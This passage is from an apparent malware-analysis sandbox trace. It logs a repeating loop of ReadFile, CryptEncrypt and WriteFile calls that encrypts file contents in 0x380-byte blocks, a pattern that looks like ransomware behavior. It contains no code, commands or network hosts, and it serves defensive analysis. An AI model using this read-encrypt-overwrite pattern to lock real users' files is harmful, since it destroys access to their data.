lpOverlapped=0x0) returned 1 [0261.114] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.114] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.115] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.115] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.115] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.115] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.116] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.116] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.116] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.116] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.116] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.116] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.116] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.117] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.117] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.118] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.118] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.119] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.119] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.119] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.119] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.119] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.119] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.119] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.120] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.120] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.120] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.120] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.120] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 